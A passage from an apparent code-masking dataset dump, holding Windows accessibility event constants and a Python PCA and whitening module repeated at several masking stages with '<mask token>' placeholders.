0x10b\nIA2_EVENT_HYPERTEXT_LINK_SELECTED = 0x10c\nIA2_EVENT_HYPERLINK_START_INDEX_CHANGED = 0x10d\nIA2_EVENT_HYPERTEXT_CHANGED = 0x10e\nIA2_EVENT_HYPERTEXT_NLINKS_CHANGED = 0x11f\nIA2_EVENT_OBJECT_ATTRIBUTE_CHANGED = 0x120\nIA2_EVENT_PAGE_CHANGED = 0x111\nIA2_EVENT_SECTION_CHANGED = 0x112\nIA2_EVENT_TABLE_CAPTION_CHANGED = 0x113\nIA2_EVENT_TABLE_COLUMN_DESCRIPTION_CHANGED = 0x114\nIA2_EVENT_TABLE_COLUMN_HEADER_CHANGED = 0x115\nIA2_EVENT_TABLE_MODEL_CHANGED = 0x116\nIA2_EVENT_TABLE_ROW_DESCRIPTION_CHANGED = 0x117\nIA2_EVENT_TABLE_ROW_HEADER_CHANGED = 0x118\nIA2_EVENT_TABLE_SUMMARY_CHANGED = 0x119\nIA2_EVENT_TEXT_ATTRIBUTE_CHANGED = 0x11a\nIA2_EVENT_TEXT_CARET_MOVED = 0x11b\nIA2_EVENT_TEXT_CHANGED = 0x11c\nIA2_EVENT_TEXT_COLUMN_CHANGED = 0x11d\nIA2_EVENT_TEXT_INSERTED = 0x11e\nIA2_EVENT_TEXT_REMOVED = 0x11f\nIA2_EVENT_TEXT_UPDATED = 0x120\nIA2_EVENT_TEXT_SELECTION_CHANGED = 0x121\nIA2_EVENT_VISIBLE_DATA_CHANGED = 0x122\n\nUNLOCALIZED_EVENT_NAMES = {\n\n 0x1: u'EVENT_SYSTEM_SOUND',\n 0x2: u'EVENT_SYSTEM_ALERT',\n 0x3: u'EVENT_SYSTEM_FOREGROUND',\n 0x4: u'EVENT_SYSTEM_MENUSTART',\n 0x5: u'EVENT_SYSTEM_MENUEND',\n 0x6: u'EVENT_SYSTEM_MENUPOPUPSTART',\n 0x7: u'EVENT_SYSTEM_MENUPOPUPEND',\n 0x8: u'EVENT_SYSTEM_CAPTURESTART',\n 0x9: u'EVENT_SYSTEM_CAPTUREEND',\n 0xa: u'EVENT_SYSTEM_MOVESIZESTART',\n 0xb: u'EVENT_SYSTEM_MOVESIZEEND',\n 0xc: u'EVENT_SYSTEM_CONTEXTHELPSTART',\n 0xd: u'EVENT_SYSTEM_CONTEXTHELPEND',\n 0xe: u'EVENT_SYSTEM_DRAGDROPSTART',\n 0xf: u'EVENT_SYSTEM_DRAGDROPEND',\n 0x10: u'EVENT_SYSTEM_DIALOGSTART',\n 0x11: u'EVENT_SYSTEM_DIALOGEND',\n 0x12: u'EVENT_SYSTEM_SCROLLINGSTART',\n 0x13: u'EVENT_SYSTEM_SCROLLINGEND',\n 0x14: u'EVENT_SYSTEM_SWITCHSTART',\n 0x15: u'EVENT_SYSTEM_SWITCHEND',\n 0x16: u'EVENT_SYSTEM_MINIMIZESTART',\n 0x17: u'EVENT_SYSTEM_MINIMIZEEND',\n\n 0x101: u'IA2_EVENT_ACTION_CHANGED',\n 0x102: u'IA2_EVENT_ACTIVE_DESCENDANT_CHANGED',\n 0x103: u'IA2_EVENT_DOCUMENT_ATTRIBUTE_CHANGED',\n 0x104: u'IA2_EVENT_DOCUMENT_CONTENT_CHANGED',\n 0x105: u'IA2_EVENT_DOCUMENT_LOAD_COMPLETE',\n 0x106: u'IA2_EVENT_DOCUMENT_LOAD_STOPPED',\n 0x107: u'IA2_EVENT_DOCUMENT_RELOAD',\n 0x108: u'IA2_EVENT_HYPERLINK_END_INDEX_CHANGED',\n 0x109: u'IA2_EVENT_HYPERLINK_NUMBER_OF_ANCHORS_CHANGED',\n 0x10a: u'IA2_EVENT_HYPERLINK_SELECTED_LINK_CHANGED',\n 0x10b: u'IA2_EVENT_HYPERTEXT_LINK_ACTIVATED',\n 0x10c: u'IA2_EVENT_HYPERTEXT_LINK_SELECTED',\n 0x10d: u'IA2_EVENT_HYPERLINK_START_INDEX_CHANGED',\n 0x10e: u'IA2_EVENT_HYPERTEXT_CHANGED',\n 0x10f: u'IA2_EVENT_HYPERTEXT_NLINKS_CHANGED',\n 0x110: u'IA2_EVENT_OBJECT_ATTRIBUTE_CHANGED',\n 0x111: u'IA2_EVENT_PAGE_CHANGED',\n 0x112: u'IA2_EVENT_SECTION_CHANGED',\n 0x113: u'IA2_EVENT_TABLE_CAPTION_CHANGED',\n 0x114: u'IA2_EVENT_TABLE_COLUMN_DESCRIPTION_CHANGED',\n 0x115: u'IA2_EVENT_TABLE_COLUMN_HEADER_CHANGED',\n 0x116: u'IA2_EVENT_TABLE_MODEL_CHANGED',\n 0x117: u'IA2_EVENT_TABLE_ROW_DESCRIPTION_CHANGED',\n 0x118: u'IA2_EVENT_TABLE_ROW_HEADER_CHANGED',\n 0x119: u'IA2_EVENT_TABLE_SUMMARY_CHANGED',\n 0x11a: u'IA2_EVENT_TEXT_ATTRIBUTE_CHANGED',\n 0x11b: u'IA2_EVENT_TEXT_CARET_MOVED',\n 0x11c: u'IA2_EVENT_TEXT_CHANGED',\n 0x11d: u'IA2_EVENT_TEXT_COLUMN_CHANGED',\n 0x11e: u'IA2_EVENT_TEXT_INSERTED',\n 0x11f: u'IA2_EVENT_TEXT_REMOVED',\n 0x120: u'IA2_EVENT_TEXT_UPDATED',\n 0x121: u'IA2_EVENT_TEXT_SELECTION_CHANGED',\n 0x122: u'IA2_EVENT_VISIBLE_DATA_CHANGED',\n\n 0x4001: u'EVENT_CONSOLE_CARET',\n 0x4002: u'EVENT_CONSOLE_UPDATE_REGION',\n 0x4003: u'EVENT_CONSOLE_UPDATE_SIMPLE',\n 0x4004: u'EVENT_CONSOLE_UPDATE_SCROLL',\n 0x4005: u'EVENT_CONSOLE_LAYOUT',\n 0x4006: u'EVENT_CONSOLE_START_APPLICATION',\n 0x4007: u'EVENT_CONSOLE_END_APPLICATION',\n\n 0x8000: u'EVENT_OBJECT_CREATE',\n 0x8001: u'EVENT_OBJECT_DESTROY',\n 0x8002: u'EVENT_OBJECT_SHOW',\n 0x8003: u'EVENT_OBJECT_HIDE',\n 0x8004: u'EVENT_OBJECT_REORDER',\n 0x8005: u'EVENT_OBJECT_FOCUS',\n 0x8006: u'EVENT_OBJECT_SELECTION',\n 0x8007: u'EVENT_OBJECT_SELECTIONADD',\n 0x8008: u'EVENT_OBJECT_SELECTIONREMOVE',\n 0x8009: u'EVENT_OBJECT_SELECTIONWITHIN',\n 0x800a: u'EVENT_OBJECT_STATECHANGE',\n 0x800b: u'EVENT_OBJECT_LOCATIONCHANGE',\n 0x800c: u'EVENT_OBJECT_NAMECHANGE',\n 0x800d: u'EVENT_OBJECT_DESCRIPTIONCHANGE',\n 0x800e: u'EVENT_OBJECT_VALUECHANGE',\n 0x800f: u'EVENT_OBJECT_PARENTCHANGE',\n 0x8010: u'EVENT_OBJECT_HELPCHANGE',\n 0x8011: u'EVENT_OBJECT_DEFACTIONCHANGE',\n 0x8012: u'EVENT_OBJECT_ACCELERATORCHANGE'}\n\n\nwinEventIDsToEventNames={}\n\nfor _sym, _val in locals().items():\n if _sym.startswith('EVENT_') or _sym.startswith('IA2_EVENT_'):\n winEventIDsToEventNames[_val] = _sym\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import numpy as np
import pandas as pd
import matplotlib as plt
import scipy.linalg
from distance_metrics import *
import time
import random
RANDOM_SEED = 42
np.random.seed(RANDOM_SEED)
random.seed(RANDOM_SEED)
################################################################
# PCA #
################################################################
def project(X, U, p = None):
if p == None: p = X.shape[1]
Z = np.matmul(X, U)
Z[:, p:] = np.mean(Z[:, p:], axis = 0)
X2 = np.matmul(Z, U.transpose())
return (Z, X2)
def PCA(X, threshold = 0.9):
X2 = X - np.mean(X, axis = 0)
S = np.matmul(X2.transpose(), X2) #Covariance Matrix
[W,U] = np.linalg.eigh(S) #eigen vectors in columns
W = np.flip(W, axis = 0)
U = np.flip(U, axis = 1)
validity = np.cumsum(W)/np.sum(W) #represents validity of choosing first i+1 eigenvalues
p = np.argmax(validity>=threshold) + 1
if p<=1 or threshold == 1: p = X.shape[1]
[Z, X3] = project(X, U, p)
#Projection, P, Reconstruction, EigenVectors, EigenValues
return [Z, p, X3, U, W]
################################################################
# Whitening #
################################################################
def whiteningTransform(X, W, U):
L = np.diag(W)
Z = np.transpose(np.matmul(np.matmul(scipy.linalg.fractional_matrix_power(L, -0.5), U.transpose()), (X - np.mean(X, axis = 0)).transpose()))
return Z
|
normal
|
{
"blob_id": "c00db6d6fd903236de37ccc029ed30fd46dccdef",
"index": 7711,
"step-1": "<mask token>\n\n\ndef project(X, U, p=None):\n if p == None:\n p = X.shape[1]\n Z = np.matmul(X, U)\n Z[:, p:] = np.mean(Z[:, p:], axis=0)\n X2 = np.matmul(Z, U.transpose())\n return Z, X2\n\n\n<mask token>\n\n\ndef whiteningTransform(X, W, U):\n L = np.diag(W)\n Z = np.transpose(np.matmul(np.matmul(scipy.linalg.\n fractional_matrix_power(L, -0.5), U.transpose()), (X - np.mean(X,\n axis=0)).transpose()))\n return Z\n",
"step-2": "<mask token>\nnp.random.seed(RANDOM_SEED)\nrandom.seed(RANDOM_SEED)\n\n\ndef project(X, U, p=None):\n if p == None:\n p = X.shape[1]\n Z = np.matmul(X, U)\n Z[:, p:] = np.mean(Z[:, p:], axis=0)\n X2 = np.matmul(Z, U.transpose())\n return Z, X2\n\n\ndef PCA(X, threshold=0.9):\n X2 = X - np.mean(X, axis=0)\n S = np.matmul(X2.transpose(), X2)\n [W, U] = np.linalg.eigh(S)\n W = np.flip(W, axis=0)\n U = np.flip(U, axis=1)\n validity = np.cumsum(W) / np.sum(W)\n p = np.argmax(validity >= threshold) + 1\n if p <= 1 or threshold == 1:\n p = X.shape[1]\n [Z, X3] = project(X, U, p)\n return [Z, p, X3, U, W]\n\n\ndef whiteningTransform(X, W, U):\n L = np.diag(W)\n Z = np.transpose(np.matmul(np.matmul(scipy.linalg.\n fractional_matrix_power(L, -0.5), U.transpose()), (X - np.mean(X,\n axis=0)).transpose()))\n return Z\n",
"step-3": "<mask token>\nRANDOM_SEED = 42\nnp.random.seed(RANDOM_SEED)\nrandom.seed(RANDOM_SEED)\n\n\ndef project(X, U, p=None):\n if p == None:\n p = X.shape[1]\n Z = np.matmul(X, U)\n Z[:, p:] = np.mean(Z[:, p:], axis=0)\n X2 = np.matmul(Z, U.transpose())\n return Z, X2\n\n\ndef PCA(X, threshold=0.9):\n X2 = X - np.mean(X, axis=0)\n S = np.matmul(X2.transpose(), X2)\n [W, U] = np.linalg.eigh(S)\n W = np.flip(W, axis=0)\n U = np.flip(U, axis=1)\n validity = np.cumsum(W) / np.sum(W)\n p = np.argmax(validity >= threshold) + 1\n if p <= 1 or threshold == 1:\n p = X.shape[1]\n [Z, X3] = project(X, U, p)\n return [Z, p, X3, U, W]\n\n\ndef whiteningTransform(X, W, U):\n L = np.diag(W)\n Z = np.transpose(np.matmul(np.matmul(scipy.linalg.\n fractional_matrix_power(L, -0.5), U.transpose()), (X - np.mean(X,\n axis=0)).transpose()))\n return Z\n",
"step-4": "import numpy as np\nimport pandas as pd\nimport matplotlib as plt\nimport scipy.linalg\nfrom distance_metrics import *\nimport time\nimport random\nRANDOM_SEED = 42\nnp.random.seed(RANDOM_SEED)\nrandom.seed(RANDOM_SEED)\n\n\ndef project(X, U, p=None):\n if p == None:\n p = X.shape[1]\n Z = np.matmul(X, U)\n Z[:, p:] = np.mean(Z[:, p:], axis=0)\n X2 = np.matmul(Z, U.transpose())\n return Z, X2\n\n\ndef PCA(X, threshold=0.9):\n X2 = X - np.mean(X, axis=0)\n S = np.matmul(X2.transpose(), X2)\n [W, U] = np.linalg.eigh(S)\n W = np.flip(W, axis=0)\n U = np.flip(U, axis=1)\n validity = np.cumsum(W) / np.sum(W)\n p = np.argmax(validity >= threshold) + 1\n if p <= 1 or threshold == 1:\n p = X.shape[1]\n [Z, X3] = project(X, U, p)\n return [Z, p, X3, U, W]\n\n\ndef whiteningTransform(X, W, U):\n L = np.diag(W)\n Z = np.transpose(np.matmul(np.matmul(scipy.linalg.\n fractional_matrix_power(L, -0.5), U.transpose()), (X - np.mean(X,\n axis=0)).transpose()))\n return Z\n",
"step-5": "import numpy as np\nimport pandas as pd\nimport matplotlib as plt\nimport scipy.linalg\nfrom distance_metrics import *\n\nimport time\nimport random\nRANDOM_SEED = 42\nnp.random.seed(RANDOM_SEED)\nrandom.seed(RANDOM_SEED)\n\n\n\n################################################################\n\t\t# PCA #\n################################################################\n\ndef project(X, U, p = None):\n if p == None: p = X.shape[1]\n Z = np.matmul(X, U)\n Z[:, p:] = np.mean(Z[:, p:], axis = 0)\n X2 = np.matmul(Z, U.transpose())\n return (Z, X2)\ndef PCA(X, threshold = 0.9):\n X2 = X - np.mean(X, axis = 0)\n S = np.matmul(X2.transpose(), X2) #Covariance Matrix\n [W,U] = np.linalg.eigh(S) #eigen vectors in columns\n W = np.flip(W, axis = 0)\n U = np.flip(U, axis = 1)\n \n validity = np.cumsum(W)/np.sum(W) #represents validity of choosing first i+1 eigenvalues\n p = np.argmax(validity>=threshold) + 1\n \n if p<=1 or threshold == 1: p = X.shape[1]\n \n [Z, X3] = project(X, U, p)\n \n #Projection, P, Reconstruction, EigenVectors, EigenValues\n return [Z, p, X3, U, W]\n\n################################################################\n\t\t# Whitening #\n################################################################\n\ndef whiteningTransform(X, W, U):\n\tL = np.diag(W)\n\tZ = np.transpose(np.matmul(np.matmul(scipy.linalg.fractional_matrix_power(L, -0.5), U.transpose()), (X - np.mean(X, axis = 0)).transpose()))\n\treturn Z\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.